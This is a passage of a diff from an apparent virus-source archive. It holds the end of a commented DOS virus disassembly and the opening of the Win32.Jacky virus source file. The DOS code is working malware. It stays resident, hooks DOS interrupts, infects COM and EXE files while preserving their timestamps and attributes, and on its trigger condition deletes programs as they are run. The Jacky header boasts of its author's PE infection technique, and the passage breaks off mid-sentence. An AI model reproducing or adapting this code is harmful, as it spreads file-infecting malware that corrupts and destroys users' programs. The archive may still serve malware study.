BYTE PTR ES:[BX+2],0CBH ;ret ;929D 26 C6 47 02 CB + POP AX ;92A2 58 + ADD AX,10h ;92A3 05 10 00 + MOV ES,AX ;92A6 8E C0 + PUSH CS ;92A8 0E + POP DS ;92A9 1F + MOV CX,OFFSET L065F ;dl. wir. bez podpisu ;92AA B9 5F 06 + SHR CX,1 ;na slowa ;92AD D1 E9 + XOR SI,SI ;offset zrodlowy ;92AF 33 F6 + MOV DI,SI ;offset wynikowy ;92B1 8B FE + PUSH ES ;segment przepisanego ;92B3 06 + MOV AX,OFFSET L013C ;offset kontynuacji ;92B4 B8 3C 01 + PUSH AX ;92B7 50 + JMP DWORD PTR L05F6 ;skok w wektor int FF ;92B8 FF 2E F6 05 + + ;<- kontynuacja na nowym miejscu +L013C: MOV AX,CS ;92BC 8C C8 + MOV SS,AX ;92BE 8E D0 + MOV SP,OFFSET L065D ;92C0 BC 5D 06 + XOR AX,AX ;92C3 33 C0 + MOV DS,AX ;92C5 8E D8 + MOV AX,CS:L004B ;odtworzenie wektora int ff ;92C7 2E A1 4B 00 + MOV [BX],AX ;92CB 89 07 + MOV AL,CS:L004D ;92CD 2E A0 4D 00 + MOV [BX+2],AL ;92D1 88 47 02 + + MOV BX,SP ;sp -> paragraf ;92D4 8B DC + MOV CL,4 ;92D6 B1 04 + SHR BX,CL ;92D8 D3 EB + ADD BX,20h ;+512 ;92DA 83 C3 20 + and bx,0fff0h ;92DD 83 E3 F0 + MOV CS:L0033,BX ;paragrafy bloku potrzebne ;92E0 2E 89 1E 33 00 + MOV AH,4AH ;Set Block ;92E5 B4 4A + MOV ES,CS:L0031 ;segment bloku ;92E7 2E 8E 06 31 00 + INT 21H ;92EC CD 21 + MOV AX,3521h ;Get int 21h ;92EE B8 21 35 + INT 21H ;92F1 CD 21 + MOV CS:L0017,BX ;92F3 2E 89 1E 17 00 + MOV CS:L0019,ES ;92F8 2E 8C 06 19 00 + PUSH CS ;92FD 0E + POP DS ;92FE 1F + MOV DX,OFFSET L02D2 ;92FF BA D2 02 + MOV AX,2521h ;Set int 21h ;9302 B8 21 25 + INT 21H ;9305 CD 21 + MOV ES,[L0031] ;segment wirusa ;9307 8E 06 31 00 + MOV ES,ES:[2Ch] ;environment ;930B 26 8E 06 2C 00 + XOR DI,DI ;szukamy nazwy nosiciela ;9310 33 FF + MOV CX,7FFFh ;9312 B9 FF 7F + XOR AL,AL ;9315 32 C0 +L9317: REPNZ SCASB ;9317 F2 AE + CMP ES:[DI],AL ;9319 26 38 05 + LOOPNZ L9317 ;931C E0 F9 + MOV DX,DI ;pathname offset ;931E 8B D7 + ADD DX,3 ;9320 83 C2 03 + + MOV AX,4B00h ;Load & Execute nosiciela ;9323 B8 00 4B + PUSH ES ;9326 06 + POP DS ;pathname segment ;9327 1F + PUSH CS ;9328 0E + POP ES ;parameter block ;9329 07 + MOV BX,OFFSET L0035 ;parameter block ;932A BB 35 00 + PUSH DS ;932D 1E + PUSH ES ;932E 06 + PUSH AX ;932F 50 + PUSH BX ;9330 53 + PUSH CX ;9331 51 + PUSH DX ;9332 52 + MOV AH,2AH ;Get Date ;9333 B4 2A + INT 21H ;9335 CD 21 + MOV BYTE PTR CS:L000E,0 ;ptr aktywnosci wirusa ;9337 2E C6 06 0E 00 00 + CMP CX,1989 ;rok ;933D 81 F9 C5 07 + JZ L936F ;-> tak ;9341 74 2C + +; Mistake! Range for AL is 0 ..6 ! + + CMP AL,7 ;niedziela ? ;9343 3C 07 + JNZ L9350 ;-> nie ;9345 75 09 + INC BYTE PTR CS:L000E ;ptr aktywnosci wirusa ;9347 2E FE 06 0E 00 + JMP SHORT L936F ;934C EB 21 + + NOP ;934E 90 + NOP ;934F 90 + + ;<- to nie niedziela i rok nie 1989 +L9350: MOV AX,3508h ;Get int 8 ;9350 B8 08 35 + INT 21H ;9353 CD 21 + MOV CS:L0013,BX ;9355 2E 89 1E 13 00 + MOV CS:L0015,ES ;935A 2E 8C 06 15 00 + PUSH CS ;935F 0E + POP DS ;9360 1F + MOV WORD PTR L001F,32400 ;30 minut ;9361 C7 06 1F 00 90 7E + MOV AX,2508h ;Set int 8 ;9367 B8 08 25 + MOV DX,OFFSET L0216 ;936A BA 16 02 + INT 21H ;936D CD 21 +L936F: POP DX ;936F 5A + POP CX ;9370 59 + POP BX ;9371 5B + POP AX ;9372 58 + POP ES ;9373 07 + POP DS ;9374 1F + PUSHF ;9375 9C + CALL DWORD PTR CS:L0017 ;old int 21h (run) ;9376 2E FF 1E 17 00 + PUSH DS ;937B 1E + POP ES ;937C 07 + MOV AH,49H ;Free allocated memory ;937D B4 49 + INT 21H ;937F CD 21 + MOV AH,4DH ;Get Return code of child proc ;9381 B4 4D + INT 21H ;9383 CD 21 + MOV AH,31H ;Keep process ;9385 B4 31 + MOV DX,OFFSET L065F ;adres konca ;9387 BA 5F 06 + MOV CL,4 ;na paragrafy ;938A B1 04 + SHR DX,CL ;938C D3 EA + ADD DX,10h ;zaokraglenie ;938E 83 C2 10 + INT 21H ;9391 CD 21 + +;----------------------------------------------- +; Wlasna obsluga int 24h +;----------------------------------------------- +L0213: XOR AX,AX ;9393 33 C0 + IRET ;9395 CF + +;================================================================ +; Nowa obsluga int 8 +;---------------------------------------------------------------- +L0216: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;9396 2E 80 3E 0E 00 01 + JNZ L93CC ;-> to nie sobota ;939C 75 2E + CMP WORD PTR CS:L001F,0 ;939E 2E 83 3E 1F 00 00 + JNZ L93C7 ;-> jeszcze mamy czas ;93A4 75 21 + PUSH AX ;93A6 50 + PUSH BX ;93A7 53 + PUSH SI ;93A8 56 + MOV AH,0EH ; ;93A9 B4 0E + MOV BL,1FH ;atrybut ;93AB B3 1F + LEA SI,L0251 ;'Today is SunDay...' ;93AD 8D 36 51 02 +L93B1: MOV AL,CS:[SI] ;znak ;93B1 2E 8A 04 + CMP AL,'$' ;koniec ? ;93B4 3C 24 + JZ L93BD ;-> tak ;93B6 74 05 + INT 10H ;93B8 CD 10 + INC SI ;93BA 46 + JMP SHORT L93B1 ;93BB EB F4 + +L93BD: MOV WORD PTR CS:L001F,32400 ;reset licznika na 30min;93BD 2E C7 06 1F 00 90 7E + POP SI ;93C4 5E + POP BX ;93C5 5B + POP AX ;93C6 58 +L93C7: DEC WORD PTR CS:L001F ;licznik zwloki ;93C7 2E FF 0E 1F 00 +L93CC: JMP DWORD PTR CS:L0013 ;oryginal int 8 ;93CC 2E FF 2E 13 00 + +L0251 DB 'Today is SunDay! Why do you work so hard?',LF,CR + DB 'All work and no play make you a dull boy!',LF,CR + DB "Come on ! Let's go out and have some fun!$" + +;================================================================ +; Nowa obsluga int 21h +;---------------------------------------------------------------- +L02D2: PUSHF ;9452 9C + CMP AH,0FFH ;czy to pytanie o wirusa ? ;9453 80 FC FF + JNZ L945D ;-> nie ;9456 75 05 + MOV AX,0400h ;sygnalizacja obecnosci ;9458 B8 00 04 + POPF ;945B 9D + IRET ;945C CF + +L945D: CMP AH,0DDH ;uruchomienie nosiciela COM ? ;945D 80 FC DD + JZ L9470 ;-> tak ;9460 74 0E + CMP AX,4B00h ;Load & Execute ? ;9462 3D 00 4B + JNZ L946A ;-> nie, przezroczystosc ;9465 75 03 + JMP SHORT L949E ;-> tak ;9467 EB 35 + + NOP ;9469 90 + +L946A: POPF ;946A 9D + JMP DWORD PTR CS:L0017 ;old int 21h ;946B 2E FF 2E 17 00 + +L9470: POP AX ;<- 0DDh, uruchom nosiciela COM ;9470 58 + POP AX ;9471 58 + MOV AX,0100h ;IP ;9472 B8 00 01 + MOV CS:L000A,AX ;9475 2E A3 0A 00 + POP AX ;CS ;9479 58 + MOV CS:L000C,AX ;947A 2E A3 0C 00 + REPZ MOVSB ;przeslanie programu na wirusa ;947E F3 A4 + POPF ;9480 9D + MOV AX,CS:L000F ;? ;9481 2E A1 0F 00 + JMP DWORD PTR CS:L000A ;9485 2E FF 2E 0A 00 + + ;<- uruchamianie programu w fazie aktywnosci +L948A: XOR CX,CX ;948A 33 C9 + MOV AX,4301h ;Set file attributes ;948C B8 01 43 + INT 21H ;948F CD 21 + MOV AH,41H ;Delete Directory Entry ;9491 B4 41 + INT 21H ;9493 CD 21 + MOV AX,4B00h ;Load & Execute ;9495 B8 00 4B + POPF ;9498 9D + JMP DWORD PTR CS:L0017 ;old int 21h ;9499 2E FF 2E 17 00 + + ;<- uruchamianie programu +L949E: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;949E 2E 80 3E 0E 00 01 + JZ L948A ;-> aktywny ;94A4 74 E4 + MOV WORD PTR CS:L0070,0FFFFh ;File handle ;94A6 2E C7 06 70 00 FF FF + MOV WORD PTR CS:L008F,0 ;94AD 2E C7 06 8F 00 00 00 + MOV CS:L0080,DX ;path do programu ;94B4 2E 89 16 80 00 + MOV CS:L0082,DS ;94B9 2E 8C 1E 82 00 + PUSH AX ;94BE 50 + PUSH BX ;94BF 53 + PUSH CX ;94C0 51 + PUSH DX ;94C1 52 + PUSH SI ;94C2 56 + PUSH DI ;94C3 57 + PUSH DS ;94C4 1E + PUSH ES ;94C5 06 + CLD ;94C6 FC + MOV DI,DX ;94C7 8B FA + XOR DL,DL ;aktualny drive ;94C9 32 D2 + CMP BYTE PTR [DI+1],':' ;czy path z drive ? ;94CB 80 7D 01 3A + JNZ L94D6 ;-> nie, aktualny ;94CF 75 05 + MOV DL,[DI] ;94D1 8A 15 + AND DL,1FH ;na numer drive ;94D3 80 E2 1F +L94D6: MOV AH,36H ;Get Disk Free Space ;94D6 B4 36 + INT 21H ;94D8 CD 21 + CMP AX,0FFFFh ;94DA 3D FF FF + JNZ L94E2 ;-> drive number OK ;94DD 75 03 +L94DF: JMP L9768 ;<- drive number invalid ;94DF E9 86 02 + +L94E2: MUL BX ;* ;94E2 F7 E3 + MUL CX ;* ;94E4 F7 E1 + OR DX,DX ;94E6 0B D2 + JNZ L94EF ;-> ponad 64 KB wolne ;94E8 75 05 + CMP AX,OFFSET L065F ;=1631=dlugosc wirusa ;94EA 3D 5F 06 + JB L94DF ;94ED 72 F0 +L94EF: MOV DX,CS:L0080 ;path do programu ;94EF 2E 8B 16 80 00 + PUSH DS ;94F4 1E + POP ES ;94F5 07 + XOR AL,AL ;poszukiwanie konca ;94F6 32 C0 + MOV CX,41h ;94F8 B9 41 00 + REPNZ SCASB ;94FB F2 AE + MOV SI,CS:L0080 ;zamiana na duze litery ;94FD 2E 8B 36 80 00 +L9502: MOV AL,[SI] ;9502 8A 04 + OR AL,AL ;9504 0A C0 + JZ L9516 ;9506 74 0E + CMP AL,61H ;'a' ;9508 3C 61 + JB L9513 ;950A 72 07 + CMP AL,7AH ;'z' ;950C 3C 7A + JA L9513 ;950E 77 03 + SUB BYTE PTR [SI],20H ;' ' ;9510 80 2C 20 +L9513: INC SI ;9513 46 + JMP SHORT L9502 ;9514 EB EC + +L9516: MOV CX,0Bh ;czy to command ? ;9516 B9 0B 00 + SUB SI,CX ;9519 2B F1 + MOV DI,OFFSET L0084 ;'command.com' ;951B BF 84 00 + PUSH CS ;951E 0E + POP ES ;951F 07 + MOV CX,0Bh ;9520 B9 0B 00 + REPZ CMPSB ;9523 F3 A6 + JNZ L952A ;-> nie ;9525 75 03 + JMP L9768 ;-> tak, odpuszczamy ;9527 E9 3E 02 + +L952A: MOV AX,4300h ;Get File Attributes ;952A B8 00 43 + INT 21H ;952D CD 21 + JB L9536 ;952F 72 05 + MOV CS:L0072,CX ;atrybut zarazanego zbioru ;9531 2E 89 0E 72 00 +L9536: JB L955D ;9536 72 25 + XOR AL,AL ;znacznik zbioru COM ;9538 32 C0 + MOV CS:L004E,AL ;0=COM, 1=EXE ;953A 2E A2 4E 00 + PUSH DS ;szukamy konca nazwy ;953E 1E + POP ES ;953F 07 + MOV DI,DX ;9540 8B FA + MOV CX,41h ;9542 B9 41 00 + REPNZ SCASB ;9545 F2 AE + CMP BYTE PTR [DI-2],4DH ;'M'-ostatnia litera ;9547 80 7D FE 4D + JZ L9558 ;-> tak, COM ;954B 74 0B + CMP BYTE PTR [DI-2],6DH ;'m' ;954D 80 7D FE 6D + JZ L9558 ;-> tak, com ;9551 74 05 + INC BYTE PTR CS:L004E ;<- EXE ;9553 2E FE 06 4E 00 +L9558: MOV AX,3D00h ;Open Handle ;9558 B8 00 3D + INT 21H ;955B CD 21 +L955D: JB L95B9 ;955D 72 5A + MOV CS:L0070,AX ;File handle ;955F 2E A3 70 00 + MOV BX,AX ;9563 8B D8 + MOV AX,4202h ;Move file ptr EOF+offs ;9565 B8 02 42 + MOV CX,0FFFFh ;-5 (piec ostatnich bajtow) ;9568 B9 FF FF + MOV DX,0FFFBh ;956B BA FB FF + INT 21H ;956E CD 21 + JB L955D ;9570 72 EB + ADD AX,5 ;+5 bajtow sygnatury ;9572 05 05 00 + MOV CS:L0011,AX ;dlugosc programu oryginalna ;9575 2E A3 11 00 + MOV CX,5 ;dlugosc sygnatury ;9579 B9 05 00 + MOV DX,OFFSET L006B ;bufor na sygnature ;957C BA 6B 00 + MOV AX,CS ;957F 8C C8 + MOV DS,AX ;9581 8E D8 + MOV ES,AX ;9583 8E C0 + MOV AH,3FH ;Read Handle ;9585 B4 3F + INT 21H ;9587 CD 21 + MOV DI,DX ;przeczytana sygnatura ;9589 8B FA + MOV SI,OFFSET L0005 ;wzorzec sygnatury ;958B BE 05 00 + REPZ CMPSB ;958E F3 A6 + JNZ L9599 ;-> jeszcze nie zarazony ;9590 75 07 + MOV AH,3EH ;Close Handle ;9592 B4 3E + INT 21H ;9594 CD 21 + JMP L9768 ;9596 E9 CF 01 + + ;<----- zarazanie zbioru +L9599: MOV AX,3524h ;Get int 24h ;9599 B8 24 35 + INT 21H ;959C CD 21 + MOV L001B,BX ;959E 89 1E 1B 00 + MOV L001D,ES ;95A2 8C 06 1D 00 + MOV DX,OFFSET L0213 ;L9393 ;95A6 BA 13 02 + MOV AX,2524h ;Set int 24h ;95A9 B8 24 25 + INT 21H ;95AC CD 21 + + LDS DX,DWORD PTR L0080 ;ptr na path ;95AE C5 16 80 00 + XOR CX,CX ;95B2 33 C9 + MOV AX,4301h ;Set File attributes ;95B4 B8 01 43 + INT 21H ;95B7 CD 21 +L95B9: JB L95F6 ;95B9 72 3B + MOV BX,CS:L0070 ;File handle ;95BB 2E 8B 1E 70 00 + MOV AH,3EH ;Close Handle ;95C0 B4 3E + INT 21H ;95C2 CD 21 + MOV WORD PTR CS:L0070,0FFFFh ;File handle ;95C4 2E C7 06 70 00 FF FF + MOV AX,3D02h ;Open Handle R/W ;95CB B8 02 3D + INT 21H ;95CE CD 21 + JB L95F6 ;95D0 72 24 + MOV CS:L0070,AX ;File handle ;95D2 2E A3 70 00 + MOV AX,CS ;95D6 8C C8 + MOV DS,AX ;95D8 8E D8 + MOV ES,AX ;95DA 8E C0 + MOV BX,L0070 ;File handle ;95DC 8B 1E 70 00 + MOV AX,5700h ;Get File Date/Time ;95E0 B8 00 57 + INT 21H ;95E3 CD 21 + MOV L0074,DX ;95E5 89 16 74 00 + MOV L0076,CX ;95E9 89 0E 76 00 + MOV AX,4200h ;Move file ptr BOF+offs ;95ED B8 00 42 + XOR CX,CX ;95F0 33 C9 + MOV DX,CX ;95F2 8B D1 + INT 21H ;95F4 CD 21 +L95F6: JB L9636 ;95F6 72 3E + CMP BYTE PTR L004E,0 ;0=COM, 1=EXE ;95F8 80 3E 4E 00 00 + JZ L9603 ;95FD 74 04 + JMP SHORT L965C ;95FF EB 5B + + NOP ;9601 90 + NOP ;9602 90 + + ;<----- Zarazenie COM'a +L9603: MOV BX,1000h ;zadanie 64KB bufora pamieci ;9603 BB 00 10 + MOV AH,48H ;allocate memory ;9606 B4 48 + INT 21H ;9608 CD 21 + JNB L9617 ;-> powiodlo sie ;960A 73 0B + MOV AH,3EH ;Close Handle ;960C B4 3E + MOV BX,L0070 ;File handle ;960E 8B 1E 70 00 + INT 21H ;9612 CD 21 + JMP L9768 ;9614 E9 51 01 + +L9617: INC WORD PTR L008F ;9617 FF 06 8F 00 + MOV ES,AX ;nowy blok pamieci ;961B 8E C0 + XOR SI,SI ;961D 33 F6 + MOV DI,SI ;961F 8B FE + MOV CX,OFFSET L065F ;9621 B9 5F 06 + REPZ MOVSB ;przepisanie do bufora ;9624 F3 A4 + + MOV DX,DI ;pierwsze wolne miejsce ;9626 8B D7 + MOV CX,L0011 ;dlugosc programu oryginalna ;9628 8B 0E 11 00 + MOV BX,L0070 ;File handle ;962C 8B 1E 70 00 + PUSH ES ;9630 06 + POP DS ;9631 1F + MOV AH,3FH ;Read Handle ;9632 B4 3F + INT 21H ;9634 CD 21 +L9636: JB L9657 ;9636 72 1F + ADD DI,CX ;na poczatek zbioru ;9638 03 F9 + XOR CX,CX ;963A 33 C9 + MOV DX,CX ;963C 8B D1 + MOV AX,4200h ;Move file ptr BOF+offs ;963E B8 00 42 + INT 21H ;9641 CD 21 + MOV SI,OFFSET L0005 ;dopisanie ogonka ;9643 BE 05 00 + MOV CX,5 ;9646 B9 05 00 + PUSH DS ;9649 1E + PUSH CS ;964A 0E + POP DS ;964B 1F + REPZ MOVSB ;964C F3 A4 + POP DS ;964E 1F + MOV CX,DI ;nowa dlugosc programu ;964F 8B CF + XOR DX,DX ;bufor z wynikowym programem ;9651 33 D2 + MOV AH,40H ;Write Handle ;9653 B4 40 + INT 21H ;9655 CD 21 +L9657: JB L9666 ;9657 72 0D + JMP L9723 ;9659 E9 C7 00 + + ;<----- Zarazenie EXE'ca +L965C: MOV CX,1Ch ;EXE file header - dlugosc ;965C B9 1C 00 + MOV DX,OFFSET L004F ; - bufor ;965F BA 4F 00 + MOV AH,3FH ;Read Handle ;9662 B4 3F + INT 21H ;9664 CD 21 +L9666: JB L96B2 ;9666 72 4A + MOV WORD PTR L0061,1984h ;suma kontrolna ;9668 C7 06 61 00 84 19 + MOV AX,L005D ;SS ;966E A1 5D 00 + MOV L0045,AX ;9671 A3 45 00 + MOV AX,L005F ;SP ;9674 A1 5F 00 + MOV L0043,AX ;9677 A3 43 00 + MOV AX,L0063 ;IP ;967A A1 63 00 + MOV L0047,AX ;967D A3 47 00 + MOV AX,L0065 ;CS ;9680 A1 65 00 + MOV L0049,AX ;9683 A3 49 00 + MOV AX,L0053 ;sile size - pages ;9686 A1 53 00 + CMP WORD PTR L0051,0 ;last page bytes ;9689 83 3E 51 00 00 + JZ L9691 ;968E 74 01 + DEC AX ;9690 48 +L9691: MUL WORD PTR L0078 ;* ;9691 F7 26 78 00 + ADD AX,L0051 ;+last page bytes ;9695 03 06 51 00 + ADC DX,0 ;9699 83 D2 00 + ADD AX,0Fh ;zaokraglenie ;969C 05 0F 00 + ADC DX,0 ;969F 83 D2 00 + AND AX,0FFF0h ;96A2 25 F0 FF + MOV L007C,AX ;96A5 A3 7C 00 + MOV L007E,DX ;96A8 89 16 7E 00 + ADD AX,OFFSET L0664 ;dlugosc z sygnatura ;96AC 05 64 06 + ADC DX,0 ;96AF 83 D2 00 +L96B2: JB L96EE ;96B2 72 3A + DIV WORD PTR L0078 ;bytes per page ;96B4 F7 36 78 00 + OR DX,DX ;czy jest reszta ? ;96B8 0B D2 + JZ L96BD ;-> nie ;96BA 74 01 + INC AX ;<- jest reszta ;96BC 40 +L96BD: MOV L0053,AX ;pages per file ;96BD A3 53 00 + MOV L0051,DX ;last page bytes ;96C0 89 16 51 00 + MOV AX,L007C ;nowa dlugosc calosci ;96C4 A1 7C 00 + MOV DX,L007E ;96C7 8B 16 7E 00 + DIV WORD PTR L007A ;na paragrafy ;96CB F7 36 7A 00 + SUB AX,L0057 ;header size ;96CF 2B 06 57 00 + MOV L0065,AX ;CS wirusa ;96D3 A3 65 00 + MOV WORD PTR L0063,OFFSET L00C4 ;IP wirusa ;96D6 C7 06 63 00 C4 00 + MOV L005D,AX ;SS wirusa ;96DC A3 5D 00 + MOV WORD PTR L005F,OFFSET L065D ;SP wirusa ;96DF C7 06 5F 00 5D 06 + XOR CX,CX ;96E5 33 C9 + MOV DX,CX ;96E7 8B D1 + MOV AX,4200h ;Move file ptr BOF+offs ;96E9 B8 00 42 + INT 21H ;96EC CD 21 +L96EE: JB L96FA ;96EE 72 0A + MOV CX,1Ch ;zapis zmodyf. headera ;96F0 B9 1C 00 + MOV DX,OFFSET L004F ;96F3 BA 4F 00 + MOV AH,40H ;write handle ;96F6 B4 40 + INT 21H ;96F8 CD 21 +L96FA: JB L970D ;96FA 72 11 + CMP AX,CX ;96FC 3B C1 + JNZ L9723 ;-> nie cale poszlo ;96FE 75 23 + MOV DX,L007C ;nowa dlugosc zbioru ;9700 8B 16 7C 00 + MOV CX,L007E ;9704 8B 0E 7E 00 + MOV AX,4200h ;Move file ptr BOF+offs ;9708 B8 00 42 + INT 21H ;970B CD 21 +L970D: JB L9723 ;970D 72 14 + XOR DX,DX ;970F 33 D2 + MOV CX,065Fh ;9711 B9 5F 06 + MOV AH,40H ;Write Handle ;9714 B4 40 + INT 21H ;9716 CD 21 + MOV CX,5 ;9718 B9 05 00 + LEA DX,L0005 ;971B 8D 16 05 00 + MOV AH,40H ;Write Handle ;971F B4 40 + INT 21H ;9721 CD 21 + + ;<----- wspolny koniec +L9723: CMP WORD PTR CS:L008F,0 ;znacznik zajecia bloku ;9723 2E 83 3E 8F 00 00 + JZ L972F ;9729 74 04 + MOV AH,49H ;Free allocated memory ;972B B4 49 + INT 21H ;972D CD 21 +L972F: CMP WORD PTR CS:L0070,-1 ;File handle ;972F 2E 83 3E 70 00 FF + JZ L9768 ;-> nie otwarty ;9735 74 31 + MOV BX,CS:L0070 ;File handle ;9737 2E 8B 1E 70 00 + MOV DX,CS:L0074 ;973C 2E 8B 16 74 00 + MOV CX,CS:L0076 ;9741 2E 8B 0E 76 00 + MOV AX,5701h ;Set File Time/Date ;9746 B8 01 57 + INT 21H ;9749 CD 21 + MOV AH,3EH ;Close Handle ;974B B4 3E + INT 21H ;974D CD 21 + PUSH CS ;974F 0E + POP DS ;9750 1F + LDS DX,DWORD PTR L0080 ;ptr nazwy zbioru ;9751 C5 16 80 00 + MOV CX,CS:L0072 ;atry zarazanego zbioru ;9755 2E 8B 0E 72 00 + MOV AX,4301h ;Set File Attributes ;975A B8 01 43 + INT 21H ;975D CD 21 + LEA DX,L001B ;975F 8D 16 1B 00 + MOV AX,2524h ;Set int 24h vector ;9763 B8 24 25 + INT 21H ;9766 CD 21 +L9768: POP ES ;9768 07 + POP DS ;9769 1F + POP DI ;976A 5F + POP SI ;976B 5E + POP DX ;976C 5A + POP CX ;976D 59 + POP BX ;976E 5B + POP AX ;976F 58 + POPF ;9770 9D + JMP DWORD PTR CS:L0017 ;old int 21h ;9771 2E FF 2E 17 00 + +L05F6 dw 03FCh ;<- adres wektora int ff ;9776 FC 03 + dw 0 ;9778 00 00 + + ;<------ stos + db 0 ;977A 00 + + dw 0 ;977B 00 00 + dw 0 ;977D 00 00 + dw 0 ;977F 00 00 + dw 0 ;9781 00 00 + dw 0 ;9783 00 00 + dw 0 ;9785 00 00 + dw 0 ;9787 00 00 + dw 0 ;9789 00 00 + dw 0 ;978B 00 00 + dw 0 ;978D 00 00 + dw 0 ;978F 00 00 + dw 0 ;9791 00 00 + dw 0 ;9793 00 00 + dw 0 ;9795 00 00 + dw 0 ;9797 00 00 + dw 0 ;9799 00 00 + dw 0 ;979B 00 00 + dw 0 ;979D 00 00 + dw 0 ;979F 00 00 + dw 0 ;97A1 00 00 + dw 0 ;97A3 00 00 + dw 0 ;97A5 00 00 + dw 0 ;97A7 00 00 + dw 156Ch ;97A9 6C 15 + dw 1261h ;97AB 61 12 + dw 2524h ;97AD 24 25 + dw 0005h ;97AF 05 00 + dw 0020h ;97B1 20 00 + dw 04EBh ;97B3 EB 04 + dw 0006h ;97B5 06 00 + dw 156Ch ;97B7 6C 15 + dw 2508h ;97B9 08 25 + dw 0FEA5h ;97BB A5 FE + dw 07BCh ;97BD BC 07 + dw 0216h ;97BF 16 02 + dw 065Eh ;97C1 5E 06 + dw 156Ch ;97C3 6C 15 + dw 0C89h ;97C5 89 0C + dw 012Fh ;97C7 2F 01 + dw 7F04h ;97C9 04 7F + dw 0075h ;97CB 75 00 + dw 065Eh ;97CD 5E 06 + dw 5A1Dh ;97CF 1D 5A + dw 0 ;97D1 00 00 + dw 9301h ;97D3 01 93 + dw 0BA6h ;97D5 A6 0B + dw 0213h ;97D7 13 02 + dw 0C89h ;97D9 89 0C + dw 0F202h ;97DB 02 F2 +L065D dw 2700h ;szczyt stosu ;97DD 00 27 + +L065F DB 0C8H,0F7h,0E1h,0EEh,0E7h ;97DF C8 F7 E1 EE E7 +L0664 label byte +S9180 ENDS + + END L9244 + diff --git a/MSDOS/Virus.MSDOS.Unknown.jacky.asm b/MSDOS/Virus.MSDOS.Unknown.jacky.asm new file mode 100644 index 00000000..ccd07dbb --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jacky.asm @@ -0,0 +1,1148 @@ +; +; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ +; Win32.Jacky.1440 ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ +; by Jacky Qwerty/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ +; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ +; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ +; +; Hello ppl, welcome to the first "Winblowz" 95/NT fully compatible virus. +; Yea i didnt mistype above, it reads "Win32" not "Win95" coz this babe is +; really a "genuine" Win32 virus, which means it should be able to infect +; any Win32 based system: Windoze 95, Windoze NT or Win32s. For some known +; reasonz that i wont delve in detail here, previous Win95 virusez were una- +; ble to spread succesfully under NT. The main reasonz were becoz they asu- +; med KERNEL32 bein loaded at a fixed base adress (not true for NT or even +; future Win95 updatez) and they also made a "guess" about where the Win32 +; API functionz were located inside the KERNEL32 itself. +; +; This virus does NOT rely on fixed memory positionz or absolute adressez in +; order to run and spread. It always works at the Win32 API level, not play- +; in its trickz "under the hood". This proves enough for the virus to spread +; succesfully on NT, asumin the user has enough rightz, of course. +; +; Unfortunately, this virus didnt make it as the first Windoze NT virus for +; the media. AVerz said they didnt have an NT machine available for virus +; testin, so they simply didnt test it under NT. Well ehem, thats what they +; said #8S. In the past summer however i finished the codin of Win32.Cabanas +; which is a far superior virus with much more featurez than its predecesor. +; This time, the guyz from Datafellowz and AVP made serious testz with Caba- +; nas under NT until they finally concluded: "Oh miracle! it is able to work +; under NT!". So acordin to the media, Win32.Cabanas is the first WinNT vi- +; rus and not Win32.Jacky as it should have been. Anywayz.. +; +; +; Technical description +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; When Win32.Jacky executes, it first looks for KERNEL32 base adress usin +; the GetModuleHandleA API right from the host import table and then it re- +; trieves all other file API function adressez by usin the GetProcAdress API +; also from the import table. These APIz are not inserted by the virus when +; infection, they are only used if they already existed there (very likely), +; but this is not a "must do" for the virus to work tho. After all Win32 API +; functionz needed by the virus have been located, it looks for PE (EXE) fi- +; lez in the current directory and infects them one by one. +; +; When infection starts, each EXE file is opened and maped in shared memory +; usin the "file mapin" API functionz provided by KERNEL32. This proves to +; be a great advance regardin file functionz as it clearly simplifies to a +; large extent the infection process and file handlin in general. After the +; PE signature is detected from the maped file, the virus inspects its im- +; port table lookin for the GetModuleHandleA and GetProcAddress APIz inside +; the KERNEL32 import descriptor. If this module is not imported, the file +; is left alone and discarded. If the GetProcAddress API is not found, the +; virus (later on when it executes) will call its own internal GetProcAd- +; dressET function, which simply inspects the KERNEL32 export table lookin +; for any specified Win32 API function. If GetModuleHandleA is not found the +; file will still get infected but then the virus, in order to find the KER- +; NEL32 base adress, will be relyin on a smoewhat undocumented feature (che- +; cked before use). This feature is very simple: whenever a PE file with un- +; bound KERNEL32 function adressez is loaded, the Win95 loader puts the KER- +; NEL32 adress in the ForwarderChain field of the KERNEL32 import descrip- +; tor. This also works in Win95 OSR2 version but doesnt work on WinNT tho, +; so it should be used with some care after makin some sanity checkz first. +; +; If the GetModuleHandleA and GetProcAddrss APIz are found, the virus will +; hardcode their IAT referencez inside the virus code, then later on when +; the virus executes, it will have these API referencez already waitin to be +; called by the installation code. After the latter API search is done, the +; virus copies itself to the last section in the file, modifies the section +; atributez to acomodate the virus code and finally changes the EntryPoint +; field in the PE header to point to the virus code. The virus doesnt change +; or modify the time/date stamp of infected filez nor it is stoped by the +; "read only" atribute. +; +; +; AVP description +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Before jumpin to the source code, lets read what AVP has to say about the +; virus. Unfortunately as u will see they didnt test the thing on NT, other- +; wise they would have had a big surprise with it hehe #8D +; +; (*) Win95.Jacky - http://www.avp.ch/avpve/newexe/win95/jacky.stm * +; +;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 +; It is a harmless nonmemory resident parasitic Win95/NT virus 1440 +; bytes of length. Being executed the virus scans Win95/NT kernel and +; gets undocumented addresses of system file access function (see the +; list below). Then it searches for NewEXE Portable Executable +; (Win95 and NT) files and writes itself to the end of the file. The +; virus aligns the file length to the section, so the file lengths +; grows more that 1440 bytes while infection. +; +; This is the first known Win95/NT parasitic virus that does not add +; new section to the file - while infecting a file the virus writes +; itself to the end of the file, increases the size of last section +; in the file, and modifies characteristics of this section. So, +; only entry point address, size and characteristics of last section +; are modified in infected files. +; +; This is also first known to me Win95/NT infector that did work on +; my test computer (Windows95) without any problem. I did not try it +; under NT. +; +; The virus contains the encrypted strings, 